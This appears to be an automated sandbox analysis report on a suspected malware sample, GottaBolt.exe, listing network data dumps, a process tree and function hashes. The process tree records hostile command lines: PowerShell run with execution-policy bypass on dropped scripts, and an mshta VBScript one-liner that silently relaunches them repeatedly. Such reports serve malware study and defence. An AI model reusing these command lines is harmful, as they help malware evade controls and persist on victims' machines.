2024-11-22 16:12:04 UTC	16384	IN	Data Raw: cb 18 e6 e9 8c 91 5f 0f a6 c2 3b dd 58 6e 4d c5 65 69 f4 2b 87 e0 b7 43 9a 24 f5 3f b4 7d 5b ce c6 e7 15 a8 ae 96 e3 9c c2 3b dc 57 3e 41 ba 26 8e 53 92 97 f1 8d 82 9f 1d 6b d9 d4 f4 96 b2 bb 33 c9 eb 88 61 d9 43 25 8a 0b d6 b3 58 ee 0b 69 da 75 3c 94 12 25 e7 46 03 c9 82 a0 ff 12 66 46 26 5a 91 1b 53 d3 a8 9e a1 8f dc 9a 72 ce 6d 91 45 4a 98 99 dd ee 53 a0 51 9d 4f b3 3a b1 de 2c 46 7a e1 10 46 05 85 61 b3 3f 84 ed 6e fb 99 a2 54 8e f5 ec d5 dc 18 99 c3 3f bb e7 7c a9 df 44 75 ff 0d 04 07 34 71 5a 7b 35 33 ac a6 50 7d eb 34 e7 2b ac b0 99 32 8d 1f 13 2c d9 7a 76 1f c3 cf 75 90 dd e0 84 9f 7a 1d 7f b5 7e a0 1a 53 c3 15 9f 30 2a 3f 5f e7 42 bd 33 0d d6 7b 68 4a 6b 24 f8 f3 16 b2 ee 44 e3 d4 5d 83 b7 fd 40 de de 6e 27 4d 66 04 f6 9a ab 28 bc 97 c1 42 91 e9 Data Ascii: _;XnMei+C$?}[;W>A&Sk3aC%Xiu<%FfF&ZSrmEJSQO:,FzFa?nT?\|Du4qZ{53P}4+2,zvuz~S0*?_B3{hJk$D]@n'Mf(B
2024-11-22 16:12:04 UTC	16384	IN	Data Raw: 7c 92 dc df 10 f4 ab 8a 6f 5e 8b f9 f1 e3 01 73 7c fc 04 0c eb cb 43 19 79 84 fe 6e 41 53 e2 2a e3 dc 9d 39 2f 75 90 d3 49 01 3c d9 5b 45 d8 c0 54 9e 24 74 62 32 f6 05 f7 0d 07 62 d8 cf 98 fd 02 26 ef 95 3a 4e 71 5d 1b e6 dd 77 19 3f db 1f f5 df e6 64 e8 85 91 e1 f1 11 93 79 03 91 0e e8 8f e3 9f d1 78 ce cc 64 dd d3 3f 0c fd 3c 9c 2d 23 c7 73 d7 77 86 e0 e7 4b 29 29 93 e4 de b1 f1 f8 3c ef c7 97 c3 55 0c cb fb c2 07 df 63 bc 7a be 90 68 01 5f 45 c8 d6 f1 66 c4 16 46 ad 2b 65 52 45 15 2b 83 73 49 7d fb 1d 8d 5e 57 b6 57 87 f2 e0 be 12 ae ce 73 05 9c fc 8b 57 2f 0d d8 ed de 46 b8 df 1f 56 8d da 8f 87 bd 2d 3f 36 1c 14 b0 44 2b 77 e7 36 51 59 bf 9f ec 8b 3a 9c 6b ed 66 d0 8a 0f 84 6a 87 11 30 46 0b 23 1f 05 2e ef e9 62 a0 f2 23 0e 2f 18 88 de 43 79 6a 4b 6e Data Ascii: \|o^s\|CynAS*9/uI<[ET$tb2b&:Nq]w?dyxd?<-#swK))<Uczh_EfF+eRE+sI}^WWsW/FV-?6D+w6QY:kfj0F#.b#/CyjKn
2024-11-22 16:12:04 UTC	16384	IN	Data Raw: 5b 47 8a 95 0e 0d 6c 5e 37 80 eb 06 b3 f8 be f5 cb ff fe 93 bd 67 c4 56 6a ea 85 19 62 94 ce e6 8b ff 71 42 77 19 2f 15 8a 71 ba f9 89 3f 7f a5 b0 3c fb 07 9f 0b 3f 59 ed 70 8f c1 09 d1 04 fb 54 93 e5 9d c1 a3 c4 65 2c 39 d6 c9 c1 a5 0f d0 4f ca c7 64 ff 06 4e e7 94 71 f3 a3 11 ce df af 93 7c e3 24 97 34 e2 99 91 92 8a 46 fa 10 46 b8 9c e3 4f a2 2a f7 16 68 50 7c 2a 94 e5 06 bb 11 73 51 a7 ff be b7 28 e7 6e 44 44 f2 07 9e 9f b3 89 da 3a 84 a4 ba 38 4c aa e6 20 b2 71 09 d7 2d 06 b2 78 fe 7e a2 95 ce 33 6f 4b 23 4f e6 2e 47 a9 6b 05 63 5a 86 32 2d ba 85 23 32 a5 fc f1 56 65 a0 40 18 74 5f 8b f2 6b d1 71 c4 fa ca 39 71 2a 93 1f 0d 57 89 3a 95 81 53 46 21 45 d3 aa 79 a1 7a 98 29 1d 57 39 d7 7c 19 0b d5 4b 2c 91 7f 82 92 bd 34 d5 71 fa 94 f9 4b f1 2e cf 82 9f Data Ascii: [Gl^7gVjbqBw/q?<?YpTe,9OdNq\|$4FFOhP\|sQ(nDD:8L q-x~3oK#O.GkcZ2-#2Ve@t_kq9q*W:SF!Eyz)W9\|K,4qK.

Target ID:	0
Start time:	11:11:35
Start date:	22/11/2024
Path:	C:\Users\user\Desktop\GottaBolt.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\GottaBolt.exe"
Imagebase:	0x252f8540000
File size:	25'560 bytes
MD5 hash:	981C56E26AE89A9190D1F1DB9D2683CE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	11:11:48
Start date:	22/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv1.ps1"
Imagebase:	0x7ff6d64d0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	11:11:48
Start date:	22/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	11:11:58
Start date:	22/11/2024
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 """""" ,0:close")
Imagebase:	0x7ff7a7fc0000
File size:	14'848 bytes
MD5 hash:	0B4340ED812DC82CE636C00FA5C9BEF2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	11:11:59
Start date:	22/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 "
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	11:11:59
Start date:	22/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	11:12:59
Start date:	22/11/2024
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 """""" ,0:close")
Imagebase:	0x7ff7a7fc0000
File size:	14'848 bytes
MD5 hash:	0B4340ED812DC82CE636C00FA5C9BEF2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	11:12:59
Start date:	22/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 "
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Analysis Process: conhost.exePID: 4000, Parent PID: 4536

General

Target ID:	13
Start time:	11:12:59
Start date:	22/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	11:13:58
Start date:	22/11/2024
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 """""" ,0:close")
Imagebase:	0x7ff7a7fc0000
File size:	14'848 bytes
MD5 hash:	0B4340ED812DC82CE636C00FA5C9BEF2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	11:13:58
Start date:	22/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 "
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 5596, Parent PID: 1252

General

Target ID:	16
Start time:	11:13:58
Start date:	22/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	9.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 00007FF848F1E7DB Relevance: .9, Instructions: 904
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2646757041.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_GottaBolt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cc7aac733fe98cb4d07bde12d1e9258e541cd6fd625d18eb6fca719efc14ddb
Instruction ID: f73165548ac3b816529eb9ba726abb089940e15c5a769efda17538b728f1696c
Opcode Fuzzy Hash: 8cc7aac733fe98cb4d07bde12d1e9258e541cd6fd625d18eb6fca719efc14ddb
Instruction Fuzzy Hash: EF52043090DA898FEB68EB6898557A877E0FF55350F0001BED44DC72D2DB39B986C789

Function 00007FF848F148D6 Relevance: .5, Instructions: 469
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2646757041.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_GottaBolt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bc577522606148e5f575e3a1000f1f0b8138cd7da3d3ef576170b9e04505b0c
Instruction ID: 9a4afc3bedd7b5074276ceca9bd001b85a7dcccee335e24380b7eb358bd457a2
Opcode Fuzzy Hash: 9bc577522606148e5f575e3a1000f1f0b8138cd7da3d3ef576170b9e04505b0c
Instruction Fuzzy Hash: 59F1923091CA4E8FEBA8EF28C8557E937D1FFA4351F04426AE84DC7295CF3499418B86

Function 00007FF848F15682 Relevance: .5, Instructions: 455
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2646757041.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_GottaBolt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca3e37858f8bfad5776fc107528df82a68259fe93af60f0599e8831213f8a3f1
Instruction ID: b4e0e7de574452ccf531ce9a6ee1331e1950f2fe85cba2326215dd07d6950b62
Opcode Fuzzy Hash: ca3e37858f8bfad5776fc107528df82a68259fe93af60f0599e8831213f8a3f1
Instruction Fuzzy Hash: 4CE1A23090CA4E8FEBA8EF28C8557E977D1FF58350F14426AD84DC7291DF78A9448B82

Function 00007FF848F1EB90 Relevance: 1.8, APIs: 1, Instructions: 324
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,?,?,?,?), ref: 00007FF848F1ED0E

Memory Dump Source

Source File: 00000000.00000002.2646757041.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_GottaBolt.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 7339310dd5be3085990625d1551d923679c231e349a9451f794853ab67241471
Instruction ID: 2d2a4dc7c2e44776ec278642bbf793add47b1d4510448b9c9b9521c251c954bd
Opcode Fuzzy Hash: 7339310dd5be3085990625d1551d923679c231e349a9451f794853ab67241471
Instruction Fuzzy Hash: DCA1F13190DA8C9FDB1ADB689849BE9BFF0EF56321F04426FD049C3192DB64A845CB91

Function 00007FF848F1E9FA Relevance: 1.8, APIs: 1, Instructions: 313
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,?,?,?,?), ref: 00007FF848F1ED0E

Memory Dump Source

Source File: 00000000.00000002.2646757041.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_GottaBolt.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: ce050b7533112d5e779aaabb02d20d81c274e2f48fec69574d4305f949136886
Instruction ID: 4dce0423bf907fac536abcb55b4e899c6b2a64fda8b86596afcdd62d49730ba0
Opcode Fuzzy Hash: ce050b7533112d5e779aaabb02d20d81c274e2f48fec69574d4305f949136886
Instruction Fuzzy Hash: 3591FF3190CA4C9FDB19DB689849BEABBF0FF56321F04426FD049D3192CB74A845CB91

Function 00007FF848F1E692 Relevance: 1.7, APIs: 1, Instructions: 205
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,?,?,?,?), ref: 00007FF848F1ED0E

Memory Dump Source

Source File: 00000000.00000002.2646757041.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_GottaBolt.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: d94ce801f4c4b569f45cf99abea1a3796e4143e4acc7ddeb1dc58035c19a12ab
Instruction ID: a0875423f53c26cd5211328505e1f4769deb443f8d3c4db115893dcd9300ae5c
Opcode Fuzzy Hash: d94ce801f4c4b569f45cf99abea1a3796e4143e4acc7ddeb1dc58035c19a12ab
Instruction Fuzzy Hash: 4351FF3190DA8C9FDB59DB688849BE9BFF0FF5A320F04426FD049D3192CB64A845CB91

Non-executed Functions

Function 00007FF848F200E7 Relevance: 3.0, Strings: 2, Instructions: 475COMMON

Download Yara Rule

Strings

_, xrefs: 00007FF848F20139
5{A, xrefs: 00007FF848F2033E

Memory Dump Source

Source File: 00000000.00000002.2646757041.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_GottaBolt.jbxd

Similarity

API ID:
String ID: 5{A$_
API String ID: 0-2574668834
Opcode ID: d7b4cdbfd4a2585812dc149da8efc2f2f1a4a4a721a967abaad5ca91e74a4c6d
Instruction ID: 36eb60e29f09f6d24c02294e73d67c1dab48e8d4e0e5cc633ca30c7b21c4089e
Opcode Fuzzy Hash: d7b4cdbfd4a2585812dc149da8efc2f2f1a4a4a721a967abaad5ca91e74a4c6d
Instruction Fuzzy Hash: 0CC1B52771E5629AD341BBBDB8451EDB760EFC13BAB044277D388CD093DA1D548A83E8

Function 00007FF848F200CF Relevance: 3.0, Strings: 2, Instructions: 466COMMON

Download Yara Rule

Strings

_, xrefs: 00007FF848F20139
5{A, xrefs: 00007FF848F2033E

Memory Dump Source

Source File: 00000000.00000002.2646757041.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_GottaBolt.jbxd

Similarity

API ID:
String ID: 5{A$_
API String ID: 0-2574668834
Opcode ID: 12f3e538af5a9721d6773122fc3594743e964a116a4e7eee71f15c0296a19186
Instruction ID: 678289adcf8d0da10f301a809335ffa9e7ab34dada0920c5754d470dd744e940
Opcode Fuzzy Hash: 12f3e538af5a9721d6773122fc3594743e964a116a4e7eee71f15c0296a19186
Instruction Fuzzy Hash: 4EC1942771E5629AD341BBBDB8451EDB760EFC13BAB044277D388CD093DA0D548A87E8

Function 00007FF848F201FA Relevance: 2.9, Strings: 2, Instructions: 370COMMON

Download Yara Rule

Strings

5{A, xrefs: 00007FF848F2033E
BN_^, xrefs: 00007FF848F20201

Memory Dump Source

Source File: 00000000.00000002.2646757041.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_GottaBolt.jbxd

Similarity

API ID:
String ID: 5{A$BN_^
API String ID: 0-3401455036
Opcode ID: 1d234afeaaaf127b8248e3c2eba2312a6780d4434c6e7ed868e10b80d9f4920e
Instruction ID: ae6b210005d64369983412c8a0ade486006c54649319b86ef1a8dc5b8c1f5980
Opcode Fuzzy Hash: 1d234afeaaaf127b8248e3c2eba2312a6780d4434c6e7ed868e10b80d9f4920e
Instruction Fuzzy Hash: AC91A42771E5629AD201B7BDB8451EDA760EFC13BAF044277D38CCD0939A1D648B83E8

Function 00007FF848F1D329 Relevance: 1.8, Strings: 1, Instructions: 516COMMON

Download Yara Rule

Strings

_, xrefs: 00007FF848F1D67C

Memory Dump Source

Source File: 00000000.00000002.2646757041.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_GottaBolt.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: 20aaf8f7fb829b77e8ced1ca56ce648d97de0d786d189574c48feb78558b3aa3
Instruction ID: 1268d2ec2a2a868f1ad51cef33ee64e141efb18264c04778689a007fbdd98d09
Opcode Fuzzy Hash: 20aaf8f7fb829b77e8ced1ca56ce648d97de0d786d189574c48feb78558b3aa3
Instruction Fuzzy Hash: E1F1D462E0E9C24FF269A62C3C141397FA1FBA2BB0B0909FBD149C74DF55649D0683C9

Function 00007FF848F201D3 Relevance: 1.6, Strings: 1, Instructions: 375COMMON

Download Yara Rule

Strings

5{A, xrefs: 00007FF848F2033E

Memory Dump Source

Source File: 00000000.00000002.2646757041.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_GottaBolt.jbxd

Similarity

API ID:
String ID: 5{A
API String ID: 0-175539463
Opcode ID: 8ccd648ea206f9c4055403dfc8a0e425a853d3ec009eaa4cb5885e0cf5375c86
Instruction ID: dbd59083a0f9fcd51878244425d39cf2131a12034460ae634560918226589b25
Opcode Fuzzy Hash: 8ccd648ea206f9c4055403dfc8a0e425a853d3ec009eaa4cb5885e0cf5375c86
Instruction Fuzzy Hash: DD91A42771E5629AD200B7BDB8451EDA760EFC13BAB144277D38CCD0939A0D648B87E8

Analysis Process: powershell.exePID: 5064, Parent PID: 5760COMMON

Executed Functions

Function 00007FF848F3AA9C Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2379618527.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0f2aa8fa2ad2b5d4831902ddd4c3e669e04e8cb219562639a88ded345de890b
Instruction ID: 453aa4d14085859653a3ae4b13cabe31669519b6f59540546936bdd7a34948d5
Opcode Fuzzy Hash: e0f2aa8fa2ad2b5d4831902ddd4c3e669e04e8cb219562639a88ded345de890b
Instruction Fuzzy Hash: 9C415A7190DB889FE748DF6C9846AF97BF0EF52320F04426FD086C71A3D625A846CB91

Function 00007FF848F3976D Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2379618527.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a6ea453072dad6bfd4ddee3c524d844a8bbdb1c90786975ae1b91d9bbe080f6
Instruction ID: 614dd7cbd63cc201e64fab8702ce8043f011f6ec1d2549b2e89d6745c2a533f7
Opcode Fuzzy Hash: 9a6ea453072dad6bfd4ddee3c524d844a8bbdb1c90786975ae1b91d9bbe080f6
Instruction Fuzzy Hash: 2A41C131A1CB888FDB09DF1CA8066A97BE0FF55310F04426FE44983692DB35A856CBC6

Function 00007FF848E1E2A0 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2378829088.00007FF848E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848e1d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71be8afd965e4baeb6fdc17a14dcd3928680579a21aad4e1f7e77c087602b0fd
Instruction ID: e3bca7313ee8f56d612d5f70f3c082a03111ba6f2340803467e13ad7bd682f25
Opcode Fuzzy Hash: 71be8afd965e4baeb6fdc17a14dcd3928680579a21aad4e1f7e77c087602b0fd
Instruction Fuzzy Hash: 7B41257180DBC54FE39A9B3898559523FF0FF52360F1506EFE088CB1A3DA25A846C792

Function 00007FF84900396F Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2380349658.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff849000000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8940e088a5a990ff231051e67dff877971cf2a96544eba19aee09f4bfa7b7e08
Instruction ID: e70f65115eec80604560a5e5d5bfb9477d3d83eb89a248928ac55e320e00d498
Opcode Fuzzy Hash: 8940e088a5a990ff231051e67dff877971cf2a96544eba19aee09f4bfa7b7e08
Instruction Fuzzy Hash: 2A115232B0C9698FDB69EA0CF8419BD73E1EB9576071401ABD10AC7196EA25EC1287C4

Function 00007FF849003C15 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2380349658.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff849000000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5855417bbb4cfe07f9ff72ac5f64e02f0c14656f6cd4e8d2a65998cd00a458b
Instruction ID: 2716183127bfd14b37a1bd5a8a6014436c7fcd23ca38f06f7944fdd7550748e0
Opcode Fuzzy Hash: f5855417bbb4cfe07f9ff72ac5f64e02f0c14656f6cd4e8d2a65998cd00a458b
Instruction Fuzzy Hash: DE014432B0C9188FDB69EA0CE4519E873E2EF54765B5400F7E10EC7153EA25EC55C785

Function 00007FF848F33F15 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2379618527.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d9de60b8f0434d1a5121a37a502b4f91203ced347bc79325f12b572c10c096b
Instruction ID: a7626b81ef5ea9df1dd1f45ec81a7e2e0e0e6997a8711165aec75e7ce9339b8b
Opcode Fuzzy Hash: 5d9de60b8f0434d1a5121a37a502b4f91203ced347bc79325f12b572c10c096b
Instruction Fuzzy Hash: 5901177111CB0C8FD748EF0CE051AAAB7E0FB99364F10056EE58AC35A5DB32E881CB45

Function 00007FF849003902 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2380349658.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff849000000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33a43510cce1d4e6d66e1e3e0d574c4fad809f6bb70896f9fe823d0bbd0eb0d3
Instruction ID: 6218bb38456f2467afe033b7e7bde6c739a84e0dda17ad951b71bcf27b453dc0
Opcode Fuzzy Hash: 33a43510cce1d4e6d66e1e3e0d574c4fad809f6bb70896f9fe823d0bbd0eb0d3
Instruction Fuzzy Hash: 3EF09A32A0C5988FDB69EA0CF4459A8B3E0FF05320B1800F6E04DC7167EB26EC018744

Function 00007FF849005884 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2380349658.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff849000000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21b3b840ecb87bde024c86152962e28f13c95420347d753b13347c05626645bc
Instruction ID: 8983052e09c31fd74b3ed6e9068522e82427ac00626d1b2b65e5570a2ddcf152
Opcode Fuzzy Hash: 21b3b840ecb87bde024c86152962e28f13c95420347d753b13347c05626645bc
Instruction Fuzzy Hash: AAF0303171CF044FE748EE2DE4496A6B7E1FBA8355F10462FE44AC3651DA25E8818786

Function 00007FF849003BB0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2380349658.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff849000000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25de7a98f95507795369c25734f88909abe14cbe7eeb8daabbb6cbcaddff7274
Instruction ID: c9d26a7b6b5d038b02c67ce7e67f6abad2bee8e32b27ff0e47e62dfdce1133cb
Opcode Fuzzy Hash: 25de7a98f95507795369c25734f88909abe14cbe7eeb8daabbb6cbcaddff7274
Instruction Fuzzy Hash: 30F05832A0D5898FDB69EF1CE4558E8B7E0FF05365B1400F6E20ACB1A3EB26EC448750

Function 00007FF848F39E60 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2379618527.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 460c77f2c9b29076d3bd2aaed11e399a579c907736753e7b02f7372a7c84c70c
Instruction ID: 289bd32c7ef0f475adfff38a4af3b4fe86d4e4fe5ab02fd658f0a8ac97004d97
Opcode Fuzzy Hash: 460c77f2c9b29076d3bd2aaed11e399a579c907736753e7b02f7372a7c84c70c
Instruction Fuzzy Hash: 62F0F63080C6898FDB06AF24C8195D87FA0FF26350F0402DBD459C74B2DB749454CB92

Non-executed Functions

Function 00007FF849004220 Relevance: 10.5, Strings: 8, Instructions: 465COMMON

